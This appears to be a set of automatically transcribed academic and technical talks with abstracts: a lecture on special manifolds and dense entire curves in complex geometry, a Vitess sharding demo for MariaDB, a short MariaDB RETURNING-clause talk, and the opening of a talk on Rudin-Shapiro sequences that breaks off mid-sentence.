not completely finished uh so now the conjecture two conjecture two yes yes yes yes yes no no no you you can you can show this this is not a conjecture you can show this because here for the obi-fold thing you have a decreasing property as usual so you have this decreasing property but but on the other hand here this thing in the other sense this uses the fact that we that uh we assume that on the fibers this is zero and so this means that the definition is so made so that you have local sections in fact when you have uh you can get local sections in the obi-fold sense and so you you you get this yes yes yes in order to deduce this yes yes for this this you don't need a conjecture but here for this part uses the conjecture one thank you no no thank you the conjecture two now I assume that C and delta C this is a smooth obi-fold structure so this means that C is a smooth first and that delta C has a support is supported on normal crossing divisor conjecture two if C delta C is of a general type and the meaning is that kc plus delta C is big on C so this means that kappa of C kc plus delta C is equal to the dimension of C this should imply so this this should imply when the d of C delta C this is a pseudo this is a metric jerically and C so you have this kind of uh you have this kind of a property uh what should I say so this conjecture two is just uh long this is long but uh orbifold version this is just the orbifold extension of long conjecture so this is uh very something really new which is what is more new is maybe with a thing which is uh upstairs so now I will come I don't know if you have questions you know and so now for special manifolds so we have given the definition somewhere yes the definition is here and so the point which is completely obvious first maybe zero this is birational uh bimberomorphic property bimberomorphic plus etal by etal what I mean is that if you if something is special if x is special so is any finite etal cover of x this may seem easy but this is surprisingly difficult to to show I don't know an easy proof of this this is a surprising this is a difference with some of things and in particular now this implies now that special implies weekly special which was the the definition was given in the talks of uh yoan brimbarm here so the reason is this let me just show that x is not of a general type x is certainly not of a general type you just have to take p which is equal to n the dimension and so you see that here you would get you ask this and so it's not of it's not a general type if you are in the general situation assume that you have uh map x maybe is subjective to some z which has a dimension p and so you just take l now this is if this is f this is f star of kz and so you can apply this to f star of kz and you see that the kappa of x l this is kappa of z kz and so it has to be strictly less than p so in other words x can't map onto something which is of a general type and once you know that this is also an etal property then you can show that this does not map even after finite etal cover to something which is of general type so it is weekly special and now we have seen that uh for curves uh rational and elliptic curves are special uh in particular this is easy from this and now the we shall say that x rationally connected this is rationally connected implies and then that x is special and so the proof is not very complete is fairly easy uh notice that x rationally connected this means that any two points can be connected by a chain of rational curves or even by a single one for example and we can see now that at least what is on the right hand side of the blackboard for the conjecture one here this is these are essentially some kind of a transcendental version of rational connectedness so we think of special manifolds of kind of analog of rational connected a transcendental version of a rational connectedness property so x if this is fairly easy to to see so this generalized the case where g is 0 now the case where g is 1 for example then we have 3 if kappa of x is 0 then this implies then that x is special and so this is again not uh this is not a uh really easy result this uses a kind of obfiled version of uh phevex weak positivity of direct image shifts uh pluric canonical shifts so you have uh this property this is easier to show if you assume that c1 of x is 0 then you have x is special but in a much stronger form but uh i don't have time to go now for 4 if n is 2 so we are considering the case of surfaces the case of surfaces then we have x2 is special and there is a very simple description if and only if we have kappa of x of course it has to be less than or equal to 1 and we have also pi1 of x is virtually abelian so this virtually abelian so this is exactly so this means that at least in dimension 2 we have a solution of the conjecture which has given here in the talks also by yarn greenbaum so we have this equivalence so what does it mean in practice in practice you you you can look first at kappa is minus infinity in this case we know that x is birational product p1 cross a curve of a certain genus and so this just means that this curve of a certain genus is either rational or elliptic in other curve in other terms when kappa of x is 0 we have x is special if and only if it is birational either to p2 or to p1 cross elliptic curve so this is a very simple situation and kappa is 0 we know that this is everything is special and now and actually we have in this case this is essentially k3 or abelian and the pi1 is virtually abelian or x2 is if kappa is 1 we have a slightly more difficult situation we have an elliptic vibration over some days and here we have to take into account the multiple fibers and this is a very classical result actually you can essentially I forget one case but two cases which are not very complicated after a finite et alcova you get something which has no multiple fibers and over something and so the condition of specialness is that the base again is not a curve of genotype and so this implies that the pi1 virtually abelian and so on so this is the description for unfortunately in higher dimensions starting with any three the situation is much more complicated and there is no simple characterization like this this is more complicated one thing maybe you you see this see this implies that this property is actually deformation invariant and so one can conjecture that this is true also in higher dimensions that being special this is deformation invariant and even that the core map deforms so we have now five remark in order not to believe that this is that this is the essentially the description that for any n i say positive and any k which belongs to minus infinity zero excluded one and n minus one there exists xn and yn above our compact scalar manifolds or even projective manifolds if you want of dimension n with a kappa of xn is kappa of yn and this is k here in this which is this one being special and this one not being special in other terms the coder dimension does not determine specialness in what is expected by this deformation invariance is that for any kappa except for zero and n you have both deformation families where the members are special and then deformation families where the members are not special and probably you you can even make more precise with the dimension of a core and so on you can make many things now property six is that we say if there exists a map five from cn to xn here which is this is just holomorphic but possibly transcendent cn which is non degenerate this means that at the generic point of cn the map is regular first is holomorphic and has also and is a submersive so non-degenerate then this implies then that x is special x is special so this is a version an orbital version in fact of of a Kobayashi Ochihae foreign if you want to prove this with a weekly special instead of special you just have to apply Kobayashi Ochihae foreign so we say in some sense I can say that for example that xn is weekly cn-dominable weekly cn-dominable cn-dominable this would require that this is a map holomorphic for example and this is a surjective at least on a Sarevsky open subset no it's special no no I don't I don't claim this no no I don't I don't claim this I don't I don't expect personally that you can reverse the map here no at least in dimension three possibly even dimension two I will I will go the hmm yes this might happen for example a priori no I I don't maybe maybe hmm I don't know I don't know no no no you need no no yes you need something you want also to send one point in one section do you see in one point maybe then in this case we this is in this sense maybe well what the room yes I think this is yes remark here now send maybe the important point is that in this the the manifolds which are either racy or rationally connected or with kappa is zero in some sense at least the orbifold versions and I don't don't explain what it means the orbifold versions this is a little bit more general kappa is zero this should be the what is called usually the building blocks building blocks for special manifolds spores for special manifolds this means in some sense that you can write the core under some version of cnm cnm conjecture you can write c this is g or n here you can write c the the core map as a composition of two times n vibrations here in which these ones should be rationally connected in the orbifold sense and this one with kappa is zero in the orbifold sense and so this means that you should be able to explain to decompose an arbitrary special manifolds into a sequence of vibrations with orbifold fibers either in some sense rationally connected or with kappa is zero and so this is the motivation actually for the for the conjecture one here this means this is the motivation conjecture one and now we shall see a little bit what happens maybe I will briefly say something on the conjecture one when one when n is two yes when n is one this is true the true now when n is two here again we have it depends on which thing then we have yes n is two for example so we take a surface x two for example and we would like to to show for example if x is special then this implies we then we have then this implies then we have the x is identically zero then this this is true in this case we have this direction yes and so we can look just at the classification the only trouble difficult case is the case of x is kaffy and kappa of x is equal and or the kappa of x is one here when x is a kaffy but here in this situation what we have is a result which is due to buzzard and loom here buzzard and loom they show actually for elliptic for elliptic special implies c2 dominable in the strong sense in the strong sense so that they have a map from c2 to x which is a subjective at least on the xarisk open subset but you have so this strong result here but this is in the elliptic case and this applies of course to this situation but here it doesn't apply for kaffy surfaces which are not elliptic and not kumor in this case we don't have this this thing but we still have at least the x identically zero i will not go into the details but in the projective case you have a much stronger result actually because you have many families of elliptic curves which covering elliptic curves of the kaffy surface which are in which intersect transversely you have a generic point and so this means that in the case of kaffy surfaces you have what you have you have in particular this property which is a stilt rule we have of course this property but this is an open property and we don't know this in this in this case so this is the situation and essentially for the other situation if dx is 0 this implies that x is special or if kappa of x is less than 1 so this is not very difficult to show the difficult case is when kappa of x is 2 what do we have but in this case we have longs conjecture which claims that this is not true so this longs conjecture should imply that kappa of x less than or equal to 1 so essentially under our longs conjecture this conjecture at least for dx is identically 0 this should be true but of course this is only conjectural now I will go to the to the case of rationally connected manifolds because this is the easiest case and what is the situation all right now the case of rationally connected manifolds so if we assume that x is rationally connected x rationally connected this implies certainly that we have dx is 0 because we have curves rationally curves everywhere and essentially in every direction and this implies also any x y connected by even one single rational curve so this implies in particular power for by an entire curve and so the question is now we have the the phone this is a thing we we did with Jörg Winklemann if x is rationally connected then there exists a dance metrically dance entire curve entire curve entire curve on x we have a more precise result more precisely for any sequence xn with a sequence of points in xn here in x and x and for any sequence of radius x epsilon n positive here strictly positive there exists h from c to x and tn in c with tn larger than n say such that uh subject the distance from h of tn to xn this is less or equal to n and this for any n in particular here so e so if you are given an arbitrary sequence of points in x for example and some small rally maybe i will what it is so you have so you have a sequence of points in x in x and so you have a small rally e which you are given for each here then you can get an entire curve which will meet all these small balls here so that the distance if for any n where distance this is any distance distance this is deduced deduced for a armition metric from any armition metric so you have this result here so in particular if you take a sequence of points which is which is a dance inside of x then you can you you get a dance entire curve on x so i would like to mention that this kind of result when x is unirrational unirrational this implies rationally connected of course x unirrational this means that you have some dominant rational map from x from pn to xn this is this map because you have this kind of thing that you can construct more or less explicitly so you have in particular this property so when x is unirrational essentially this theorem is empty it remains also empty as long as we don't have any kind or any example of rationally connected which is not unirrational which is the case okay so we don't have any really application where we can say we we can't apply this easy argument so there are but nevertheless yes i should say that it is expected that the general rationally connected manifolds are not unirrational so it is expected that this is not empty okay the first case of of manifolds which are not known to be to be unirrational these are the things which are x yeah x which go onto p3 the double double covers of p3 which are ramified over a smooth smooth sexting here a smooth sexting surface these are known to be fano and so they are rationally connected but till now nobody has been able to give an example which is a unirrational to find an example so this is an open question people usually expect that this might not be unirrational and so a corollary in this case is the following nevertheless corollary of this result of this dance if a smooth sexting maybe call it s here so we have this sexting corollary there exists the dance entire curve on p3 here such that maybe call it h and c to p3 such that h of c is tangent to s at any point of s at which h of c meets s meets s so we have this for example this corollary and how does it work the proof is very simple just because here we know that this is fano hence rationally connected so we consult just dance entire curves on this and now we take the image we compose with the projection pi here and because you we have a ramification of order two then you have also a dance entire curve which has this property of being tangent to to s at any point it meets this so if you if you want so this is an example of of a result that since you you don't have this rationality solution you can prove it directly and the method that we prove we we don't know how to prove it without using this and if we have a general expectation precisely the general expectation is that if we have something which is an x and a delta and so this is an orbital pair here which is a say fano in the sense that minus kx plus delta is ample on x if we have then there should exist an entire curve an orbital entire curve maybe i will hold hold from of c and then x delta for example which is dance in x for example this is the general expectation for fano yes okay so here i would like to say that i assume that this delta this is klt not lc lc you might have some trouble with this so this is an example how much do i still have five minutes five minutes okay so i will just finish to to say there are some additional when c1 of x is a row so this is also another interesting case but much more difficult in order to check this kind of property here already yes we don't know whether the solometric vanishes in in this case we don't know it in general there are some special situation where we know it but in general we don't know and the rest which is much more difficult is of course very open so when c1 of x is a row there are some results when you have elliptic vibrations or an agrangian and so on you have some results but this is extremely partial and so i will now give an idea of the proof of a ferrin which is here i mean the ferrin this ferrin here so the main lemma is the following which is not especially complicated in fact the main lemma is if we have f which goes from p1 to x for example and we assume that x is rationally connected and which is very free very free which means the following that f star of px this is ample on p1 and ample on p1 so this means that this is a direct sum of line bundles with positive degree in clear if we have this p1 p1 i will see it as a c union infinity here very free and if i'm given also a which belongs to x and some epsilon which is positive then there exists some h which goes from p1 to x which is again very free and such that ah excuse me i also take some r which is positive and some and such that very free and such that yes that h yes that the distance the distance of h of z h of z and f of z here is less than or epsilon for any z in c such that i have z is less than or equal to r and then yes there exists and there exists also something else the t belonging to c such that the the modulus of t is larger than r plus 1 so to say such that and that distance of h of t and a this is less than or equal to epsilon and so the what is the picture the picture is this one so you have f here and so you have this is f of zero i take here f of infinity which is here and i have here maybe this is the part which is d of zero r here which is here and i have somewhere else a for example which is given here and i have also the epsilon and so the point is that now i will be able to prove to prove to find some t which is large enough here outside of this such that here this is the distance here is less than or equal to epsilon on over this part and here you want you have a that here you have this t the image of t here will be closed it will be also epsilon close to a so this is the idea and so i will just explain in one word how the this we show this this this is very easy actually once you have the appropriate tool is the following that because we have now we can take a rational curve which is again very free which goes through a and f of infinity here and so i can parameterize it in some in the sense that i will call this is g of p1 which goes to x here and so this this is g of zero goes here this is g of infinity here and here i can require that this is say f of a f of one i have these three points here and now what i'm going to to say is just that i will use the smoothing technique smoothing technique of collard miauka mori 92 here 92 here so they what they say if you have two three very free rational curves you can deform them you can smooth them deform them to something which is irreducible in general when you let the rational curve degenerate you have a bunch of rational curves but here they do the contrary they can this deformation argument and so you can put this arbitrary close and you can get this one has to pay attention the one has to pay attention this is really the parameterization but this is not a complicated thing because you can do this i see yes i'm i have ah you're still one one minute okay we are not in germany okay so just i i'm finished in i will not and so once you have this what is the rest of the the rest of the proof is that you you construct a sequence construct inductively the sequence of h n which go to p1 to x here where you have the properties distance from um distance from h n of z h n plus one of z this is less than epsilon n divided by two power n plus one here and you want also to have distance of h n of a certain t n and t n here larger than than n distance of h n t n to x n is less than or equal to the thing which is n plus one and so this will say the first property will say that this will converge in the compact open topology to something which has to be holomorphic and then we the second condition we will tell you this so you have this answer and stopping here questions remarks h n where is f n n x n x n this is the sequence the given sequence so this is how to deduce from the main lemma the theorem um i hope soon yes it should be available so in the in the univational case you can actually prescribe the points right certainly i never thought of this but certainly yes okay but this is not that important for the thing we want to to deal with what would happen if at the beginning of your definition start instead of using the codire dimension of l you use the numerical dimension of l yeah i think uh if you use this so you you get a larger class a priori but you might expect that this is the same at the end but uh you know i think might expect that this is about this conjecture one yes do you expect do you expect that there is a single uh in taiaka passing through yeah okay let us say yes it doesn't cost me anything to to say this for the time being yes i would say yes or maybe epsilon close if you prefer okay yes do you see i think yes you might have in some cases but i'm not able to to give conditions a kind of gluing theorem for a little bit like this to deform entire maps to irreducible entire maps to something which is irreducible but i have no idea of what are the conditions yes i know yes i know yes single disco by a chair yes yes so this is why i was yeah yeah but i think i in this case you have a lot of this is much more flexible this should be much more flexible uh any more question if not let's thank you again
|
For complex projective manifolds X of general type, Lang claimed the equivalence between three fields: birational geometry, complex hyperbolicity, and arithmetic. We extend this equivalence to arbitrary X’s by introducing the (antithetical) class of “Special” manifolds and constructing the “Core” fibration, the unique one with special fibres and general type “orbifold” base. We conjecture that special manifolds —which are defined algebro-geometrically by a certain non-positivity of their cotangent bundles— are also exactly the ones having Zariski-dense entire curves (so violating the GGL property). We shall give (j.w. J. Winkelmann) some examples supporting this conjecture. The arithmetic aspect will be skipped.
|
10.5446/52727 (DOI)
|
Welcome. My name is Alkin and I'd like to share some experiences with Vitesse. A little bit about myself. I am a senior technical manager at Planet Scale. I am one of the maintainers for the Vitesse project. I'm an open source database evangelist, previously working at Paracord at Pythion and some of the background and enterprise. I'm also an avid sailor. If you want to talk about sailing, please do find me on Instagram or Twitter. A little bit about Planet Scale because of the relations between the Vitesse project and the company as founded in 2018 by the co-creators of Vitesse at YouTube, later on Google, currently about 45 to 50 employees located in California and it's a complete remote team due to the pandemic. On the Vitesse project, what is Vitesse question can be answered by its database clustering system for horizontal scaling of MySQL or MariaDB databases. Why we say that? It's not a database, but it's a framework that actually manages the databases that exists. So we actually take advantage of the boat's technologies on the framework and the database back end site. Vitesse does not make any changes to the existing running databases like MySQL or MariaDB. It's a CNCF-graduated project. In fact, it is one of the first database projects in CNCF, very important. That's an open source and with an Apache tool that all licensed and it has contributors from around the community with the large users of Vitesse. Today's agenda is going to be an architectural overview of Vitesse. I'm going to talk about what Vitesse is. So you have an idea and Vitesse use cases, a little bit on sharpening and where we can actually meet MariaDB as the MariaDB Dev Room. Thank you for inviting me over. On the Vitesse architecture basics, we actually enable the database infrastructure operations to be more smooth and coming from single land. The glossary for the terminology in the Vitesse world is a key space, a logical database, whether it's sharded or unsharpened, you would actually have a key space with an ID and a primary index and a Vitesse index which points to an index. So there is a little bit of an additional terms that applies for the Vitesse, which we can explain a little bit more on the proxy server as a VT gate. A VT tablet is a back end server that actually works like a sidecar. There's also a topology data store which we manage by its ID ZooKeeper or console. Consider a common replication cluster where we have a primary end replicas. VT tablet attaches to the MySQL D process in each tablet and manages the MySQL D in the back end. So these coupled database structure with a replication cluster is a tablet. And in production, you would have multiple clusters and VT gate manages them. So if we go back in time over here, each MySQL server assigned to a VT tablet and then each MySQL VT tablet is managed by a VT gate where actually it's at state this proxy, it doesn't manage but it actually routes the traffic to the VT tablets. And you can have multiple VT gates. You're not bound to single one of them. So there's no single point of failure. Also, you can scale out the number of connections and that points to the clusters that you have in the back end. VT gate also routes the traffic to the correct clusters depending on the shouting scheme. Since we are intending to shard our data set using VTES, eventually, you would have to know where your data sits. So you don't have to maintain it yourself but the VTES maintains by VT gate. And then the queries are rooted based on the schema and the shouting scheme. In this example, let's say we have a commerce database, which is a key space, and then it's sharded. There's an also internal on sharded. This is important. So you don't have to shard everything but you can still have an on sharded key spaces in your topology. And a query comes in that points to the key space and VT gates know where that customer ID ranges. Topo is another component in this architecture actually stores the state of the schemas, shards, sharding scheme and tablets, can be used by HCD. We currently actually use HCD. There are others who use console or zookeeper. We don't recommend console for some reasons. But the key space is actually used by the console for some reasons. But you may choose to do so. And this has a very small dataset and it's mostly cashed by the VT gate. VT CTLD is another component that's in our architecture, which is a control daemon and runs the ad hoc operations to the database and API server and retries the topo, which also operates on tablets. So these are the components of that. And then VTest topology knows all the schemas, shards, clusters, and it keeps a state of the latest and the greatest information because in the real production environment, these will be changing and you would need to keep them up to date as much as possible. So VTest control plane not only includes these components, but also includes some of the normal database operations you would do. So in normal production environment, you would have some sort of a proxy server, which is covered by VT gate. You would actually have a backup and recovery, which is covered by the VT gate and VT CTLD, it would test using backups and recoveries. And in this case, we could actually drive extra backup for it for different data stores. Integrated failover that is actually known as an orchestrator, and in which case for the VTest topology, it is called VTALK. And sharding schemes that you can actually horizontal or vertical that you actually apply to that. There is an also advanced replication options, which actually allows you to replicate from one key space to the other. And VStream, there is going to be an online EDL operation, which is an experimental stage at this point, but we will be driving Goal Store Perkono toolkits online schema change tools. And there's also more for that. In summary, if you have an application that's actually driving through a load balancer, you can point to VT gate and a topology server knows your sharding scheme and points to the to the tablets that you have your data sets. Let's go over for the supported backend database. This is a very popular question that has been asked in the open source community, what databases and what engine it supports. VTest is a very MySQL-centric framework, and it works perfectly fine with with my score 5.7. And it's slowly being migrated to 80. And it also works on my score eight compatible. And we already have very large users in the community that are heavily invested in the MySQL backend for hundreds of thousands of shards. And also, it is known that it works for MariaDB for the compatibility purpose. The frequently asked question whether it will work for PostgreSQL or not, it will not work for PostgreSQL. There is going to be a need for another set of implementation that needs to be managed outside of the MySQL infrastructure. And let's talk about the VTest use cases and sharding. So in many cases, what we see is not always dropping replacement for your entire application. In some cases, your application does only need to scale out on certain parts. And either you have the entire application pointed to VTest, or keep and charted and unsharded key spaces in your topology, or you just scale out where it's where you need to. And also, you can point and create a link to your existing MySQL topology and use just VTest as your management of your MySQL topology without ever changing anything on your back end. You could do sharding and resharding. That's the key point over here. So in normal cases, once you shard, that's it. There's no actually coming back from sharding. With VTest, since it knows how you sharded, it's able to reshard or unshard your data sets into different key spaces. And with this, if you scaled out with VTest and simplified and minimized your backup and recovery scenarios by keeping a smaller data sets, this is actually a big advantage for when we see a terabytes of data in a single database and having issues for both backup and recovery scenarios. There are some other use cases that you can think of, obviously, but these are the things that I just came to my mind. Where we come to the MariaDB compatibility, MariaDB, there are no extensive work has been done, as far as I know. And we are looking for contributors and users. At this point, we have not received much feedback on MariaDB usage. And my scale, MariaDB compatibility for 10.4 is still pending, and there's an open issue at GitHub. And I will be following up with Fort MariaDB and the community, see if there's anything we can do to improve that area. So for more resources, please visit VTest.io. And there's a user guide and docs over there. It's an open source. I can rephrase that, and it's open. And you can see the code. If you are willing to contribute, please see the contributor guide at the document. And there's also VTest Slack where you can actually join and create a discussion. I can create a MariaDB room if it doesn't exist, and we can discuss further on that. Let's take a look at how we can drive MariaDB through VTest. Okay, now we're at the demo section. I have built a local Docker image. As I mentioned earlier, there are a couple of options that you can test VTest against MariaDB. One of them is to build a Docker image. The other one is building locally, compiling from source. The third option is the VTest operator. There's an open source VTest operator that you can test against Minicube or your favorite Kubernetes environment like GKE. In this example, I want to demonstrate a simple use case for scaling out MariaDB database using VTest. So the Docker image already built to save time, but I want to show you the Docker file and there's going to be some dependencies installed. We set those dependencies per the flavor of the backend engine we use and then build up a cluster that is an example of this demonstration. Over here, we also have the file for the installing local dependencies and we use HCD for the topo server. I will run this Docker image and build a simple e-commerce application database. Let's say we have an e-commerce database that is struggling to scale and it has an order table. It keeps customer and product information for the sake of this example. Then we actually want to not only shard but also manage this environment without having to go any downtime. Basically, we're going to do a small migration over here against the schema. The initial database that is simply unsharded and we want to experiment sharding over it. Before getting into that, I want to show you what we are running against. We are building this image against MariaDB version 10.3. If I connect to VTGate, which in this case is our proxy for the backend instances, and take a look at the version over here, it's the MariaDB and we are actually in the VTest client space that actually connects. Then we have different commands over here that you're not familiar with. If I said show VTest tablets, it would give me an example for the cell that is the zone. It's a key space, which is the schema and the database. There are no sharding, it's unsharded. There are different tablet types. Of course, there's a primary replica and read-only tablets that is attached for this cluster. There is a little bit of an extended information over here, but basically it mimics a primary replica scenario that you would normally run in your cluster. Let's move forward with the example over here. We have some pre-set scripts over here, which you can find this under VTest IO user guides. There are different examples for both local install operator, and then you can run through this scenario to experiment yourself. I want to continue on this one, showing the customer tablets. Basically, in order to get from commerce to the customer, we need to initialize a new shard. I will run this and then it will create a new customer tablet for us so that we can migrate our commerce database, which is unsharded, to a customer key space, which will be sharded eventually. It's going to initialize. Basically, this is a driver of instances. As the database instance is coming up, we can connect and basically see those tablets coming up. This operation will bring a new cluster, which is completely configured automatically in order for us to continue our example. Next up is to moving the tables to the new key space. As you can see over here from the script, I don't want to just run it, so it's not hidden. We TCTL client with the move tables from commerce to customer, it will actually migrate this over to that new key space. I will run this and it executed already. Next up will be moving these switching reads from commerce to customer key space. Basically, we're currently switching reads that are coming into the commerce key space into the replicas that are built for the new customer key space. I will run this. Then a traffic switcher, which is our VT gate, which actually knows about all this top of server, keeps track of all this information. It can actually take all the incoming traffic and migrate into the new space. Now that this will look a little bit awkward and how to visualize, we have some web interface that you can connect to. I don't want to get into that too much because we have a new VT admin UI is coming up very soon and that is built by our contributors at Slack and will be announcing that soon. Let's continue with the example over here. Now that we switched reads, we want to look at switching writes. With this command, VT CTL client switch writes customer to commerce, we are going to switch the writes also incoming writes to that. Since there's no traffic, things are going to be fast. Of course, this is not going to be the case at your example. We have a commerce still at the state of serving. Now that we switched, they're both serving, but actually all the reads and writes are going to the customer key space. We migrated into customer, but we didn't do what we didn't do. We haven't started this space. We just prepared the topology to be able to start. We can actually drop sources for the customer and for the commerce and then we can clean up the commerce space. It's going to drop the tablet and drop the tables from the source. Now that we want the customer space, and I want to take a look at that real quick, it is going to create a sequence for that. Now we have a concept of sequences, which it doesn't exist in our MISG RMAVV space in too much, but the sequences are required for the auto increment values. This way, the VT test topology server and the VT gate can control the auto increment values that goes into this charted environment. Now we run this, it will apply the sequences and it will create the V schema for that and it will apply the sharding scheme and it will create the sharded customer space. If you look at these, you can see these files that will actually be looking like this. It will be creating a table customer sequence, which is going to be a VT test sequence category. We will be running the customer sharded environment. Now that we created the customer sharded environment, that is ready for our sharding. If you look at the V schema objects that are created, there's going to be two sequences created, one for customer, one for the order. Then the V schema objects that are created for a sharded scheme that's on hash and a customer ID on hash. You can change that and then you have the column and the sequence ID, those are attached to those values so that the test knows what the sharding scheme is. For this example, the next one will be creating the new shards that are going to be needed. Let's take a look at that. It's going to create the new shards for that and this will be the shards and it will bring up those tablets with this. Then it will initialize those shard master to the related sharding scheme. It has created those tablets, those are probably coming off. Yes, we can see the new tablets coming for the sharded customer scheme. Just to reiterate, we had a commerce key space that we actually switched over to customer and then we started our sharding scheme against the customer key space and then built a cluster that is going to be a sharded against the customer. The new shards are created. Now, within the customer space, we need to reshard from the unsharded customer key space to a sharded customer key space. Okay, run that example over here. We were able to reshard that and then what we want to do is we want to switch the reads to the new sharded customer space. Okay, and we also want to switch the writes to that customer space by the traffic switcher over here. Okay. Okay. All right. Now that we have switched, the primary customer unsharded key space is no longer serving and the switch has been made over to this. Okay. Now, we can basically get rid of that unsharded customer space and delete that. No longer need that. It's going to delete those tablets and free them up. Okay. And that's it. I wish we had more time to play with the data. We don't have too much data to show and there's also a visual example of this. Again, please visit Vites.io website under user guides. There's more comprehensive steps and implementation for this. And again, find me on Vites.lac or Twitter or other medium to ask questions, maybe even contribute. Thank you very much for listening.
|
In this talk, I'd like to give brief information about how to shard your data under MariaDB topologies and the possibility of using frameworks such as Vitess. While discussing the pros and cons of sharding I would like to showcase how structured horizontal sharding can scale your database almost infinitely. The audience will benefit from how others sharding to scale unlimited under both cloud and Kubernetes realm. In this short talk, I'd like to demo a case study that can be an example to get started for many. Vitess is a database clustering system for horizontal scaling of MySQL through sharding. By enabling shard-routing logic, Vitess allows application code and database queries to remain agnostic to the distribution of data onto multiple shards. With Vitess, you can split, merge, and migrate shards as your needs grow. With its compatibility to development frameworks and integration to open-source tools, Vitess has been a core component of several high traffic OLTP sites around the world and serving data across different platforms. Vitess is also the first Linux Foundation/Cloud Native Computing Foundation graduated open-source database project.
|
10.5446/52854 (DOI)
|
Hi, my name is Ruchha Deutar and I am a junior software engineer at my ADP Corporation. Today I am going to be speaking about Returning Clause in my ADP. But what is Returning Clause? Returning Clause is used to return the data for inserted, modified or deleted rows or alternatively the selected expression for these DMS statements. Currently, insert, replace and delete statements support the Returning Clause. Delete the supported starting from IADB server 10.0 while insert and replace the returning supported starting from IADB server 10.5. So what expressions can we use with Returning Clause? Any extra expressions that can be calculated can be used. This includes column names, virtual columns, alias, expressions which use various operators like bitwise operator, arithmetic operator, logical operator. You can also use functions, say for example control flow functions, string functions and also stored functions. Moreover, you can also use subquery and prepare statement with this. So let's see why do we need the Returning Clause? Returning retrives the modified inserted and deleted rows and without this there would be a need to run a separate select query. This phase around trip also a number of queries running can be important for the performance of your applications. So you are running less number of queries and getting the same job done. Sometimes you may want to trigger actions in an application based on what gets inserted, deleted or modified. Along with this there can be scenario where the data is generated and is not explicitly inserted into the table. For example, in case of auto increment and default values, in such situations you may want to retrieve data to trigger stuff on your application based on what data gets generated. You can use insert ignore to find out what data got inserted into the table. You can use insert on duplicate key update to find out what got updated when you inserted data into the table and trigger actions in your application based on that. So let's find out how do we use it by taking some examples. So here we have a customer's table. Suppose there is a bank and they want to find out if their new customers are eligible for loan based on their credit scores. So for this customer table we have auto increment and default values, the default field values along with other fields for which data is auto generated. So now when we use the insert statement and we want to find out if the customer is eligible for loan at the time of inserting the data then we can use returning clause and here I have used customer ID and another select statement as select expression for the returning clause. So this is the output we get customer ID and decision as columns for the output. Similarly here is another example where I have only used column names for select expression in the returning clause. Similarly you can also use returning clause with replace statement for conditional insert as shown in the example. You can also use returning clause with delete statement. Say for example if you want to delete all the records of customers whose credit score is less than 700 and you want to move them to another table then in that case you can use delete with returning clause. So here is an example for that. Here I have used customer ID and another select statement as select expression for the returning clause and the output is as shown and that brings me to the end of my presentation. Thank you. I hope you liked it.
|
RETURNING retrieves the modified, inserted or deleted values of columns. Without RETURNING, there would be a need to run an extra SELECT query.So, along with many other benefits like triggering actions in your application based on what really gets modified, it helps to avoid a round trip and still gets the same job done! Number of queries running can be important for performance of your application as well. So you can have your cake and eat it too!
|
10.5446/53712 (DOI)
|
So first of all, thank you very much to the organizers to give me this opportunity to give this presentation about recent and not so recent work by myself and my co-authors. So also thank you to the technical staff at SIRM, so this is not an easy task to organize such an online event. So we talk about generalized wooden Shapiro sequences, quite a few generalizations already available, and I will add a new one, which I find interesting and is motivated by certain property about correlations. So yes, the wooden Shapiro sequences are a fairly deterministic sequence, but it has quite some interesting randomness properties. And I use one property randomness, pseudo randomness property to generalize this wooden Shapiro sequence. So this talk is based on joint work with Irene Marcovici, so this is my colleague from NONSI, from the next door basically, at the Institute of Édicarton, and our PhD student Pierre-Adrien Taille, who will have his PhD defense in three weeks or so. And yes, so the outline is as follows of this talk. So it's a fairly long historical introduction about this wooden Shapiro sequence, and I want to give quite a few references where this wooden Shapiro sequence appears and has been generalized and made, put in context. I will then talk about small scale and large scale correlations. So this is the property that I want to take up. So this is a property that has been proven by Modri and Charcassie in 1998. And I give some results that I got about 10 years ago with Jeff Shallet and Elliot Grant, where we could basically generalize these results to prime alphabets. So the wooden Shapiro sequence is a sequence on two letters, and we could generalize this property to recover this property for generalization and prime and square free alphabets. And but we could not go to the composite numbers, and this is also the work that has been done by Pierre-Adrien in his PhD thesis based on difference matrices. And I will then talk about these correlations on these general alphabets, so large scale and small scale, where we can get the arrow term that we want, but what we originally want. And I will finish with some higher dimension generalizations that have been already in some context also studied in physics. Okay, so I start off with the original problem. So given a sequence A on two symbols, and you take minus one and plus one, you may ask what is the size of S and A, which is the supremum norm, actually of this polynomial of degree n on the unit circle, and you might ask what how large, how small can this quantity be on deterministic sequences. And from passival, you directly get that the quadratic norm equals the square root, and if you take the supremum norm, you get the lower bound of square root n, and the trivial bound is capital N. So the problem is how close can you get to square root of n. And there is a result which goes back to Siegmund and Salem from the 50s, but it proved actually that for almost all A in terms of measure, you are close to square root n up to a factor of square root log n. So there might be some possibility to get to square root n, and the root in Shapiro sequence is one of these sequences that gets very close. So the problem is to construct a deterministic sequence that has this root n property. So Shapiro's approach was the following. He started off with an interrelated recursion of two polynomial sequences, p and q. And so there is a factor of set to the n in front of the q's. You may also think about the matrix that is in front of this pq vector. This is the starting point of the generalization afterwards by several people. And he used a parallelogram rule, so very simple fact about these complex numbers, that's getting from 2 to the n plus 1 in degree to 2 to the n in the square sense, you get an additional factor of 2 only. So by induction, you can prove that this modulus of this polynomial is on the unit circle, is bounded by a constant, it's time to square root 2 to the n. And so you basically get the square root saving basically on the degree of the polynomial. You can, starting from this construction, you can define a sequence. This is how Shapiro actually started off. You can show passing from n to n plus 1. This polynomial has the same coefficient, so the first coefficient staying stable will not change. And so you can let n tend to infinity and you get what is called the root in Shapiro sequence or the root in Shapiro. Yeah, if you truncate it in Shapiro polynomial. And he proved that this supremum norm of this polynomial on the unit circle is bounded by a constant times the square root of the degree of the polynomial. And so there are three names related to the sequence and maybe history did not respect the correct way to name the sequence. There has been one paper from Moïse Collet in optics and spectrometry where he already used this kind of construction. He spoke about these pairs of like adhesion elements. So when you look at consecutive ones in a digital expansion, this is very, very close to this original definition of the root in Shapiro sequence. And as many of you know, Shapiro wrote this thesis and who he was in the jury of his thesis. So this is how the name of the root in Shapiro sequence got his name. There are several people that try to give that sequence a new name. So there is a Gaulle Shapiro. There is Gaulle Rudin Shapiro. So I just want to mention this historical fact that maybe it's not undisputed how to name the sequence. I will stick for this talk to Rudin Shapiro but still to give you the mention that Paul A. So this square root N property is not specific to Rudin Shapiro sequence. There are several other sequences that have this property. And one of these is the paper folding sequence. So this is if you take a sheet of paper and you fold it and do it in an infinite way, you can count the right and the left turns and you get a 